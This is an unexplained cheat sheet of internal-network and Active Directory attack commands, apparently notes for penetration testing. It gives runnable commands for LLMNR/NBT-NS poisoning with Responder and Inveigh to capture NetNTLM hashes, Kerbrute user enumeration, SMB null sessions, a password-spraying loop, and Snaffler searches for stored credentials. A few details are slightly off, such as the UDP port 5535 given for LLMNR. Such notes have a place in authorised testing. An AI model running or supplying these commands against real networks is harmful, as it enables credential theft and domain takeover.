Enumeration Tricks:


tcpdump -i <interface>

Responder for DNS requests to identify unique hosts

Responder for LLMNR over UDP 5535 OR NBT-NS over UDP 137 to obtain NetNTLM Hash

responder -I <interface> -A

Fping Active Checking a Subnet:

fping -asgq

Enumerate hosts:

netdiscover -r <subnet> | awk '{print $1}'

Enumerate AD Users with Kerbrute:

kerbrute userenum -d <domain_name> --dc <dc_ip> jsmith.txt -o valid_ad_user_accounts

Using Inveigh for LLMNR/NBT-NS request poisoning

Import-Module .\inveigh.ps1
(Get-Command Invoke-Inveigh).Parameters
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

With valid domain credentials, Using CrackMapExec to obtain the password policy

crackmapexec smb -u <user> -p <password> --pass-pol

Establishing a null session from windows

net use \\DC01\ipc$ "" /u:""

View windows account errors:

net use \\DC01\ip$ "" /u:guest

Internal Password Spraying through Linux:

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" <dc> | grep Authority; done

Microsoft LAPS Enumeration:


If SMB Null sessions, use rpcclient to enumerate AD:

rpcclient -U "" -N <dc>

RPCClient Enumeration:

queryuser 0x444

Find Domain Admins with windapsearch:

python3 windapsearch.py --dc-ip <dc_ip> -u user@domain.local -p <password> --da

Find credentials/sensitive data in AD with Snaffler.exe:

Snaffler.exe -s -d <domain>.local -o snaffler.log -v data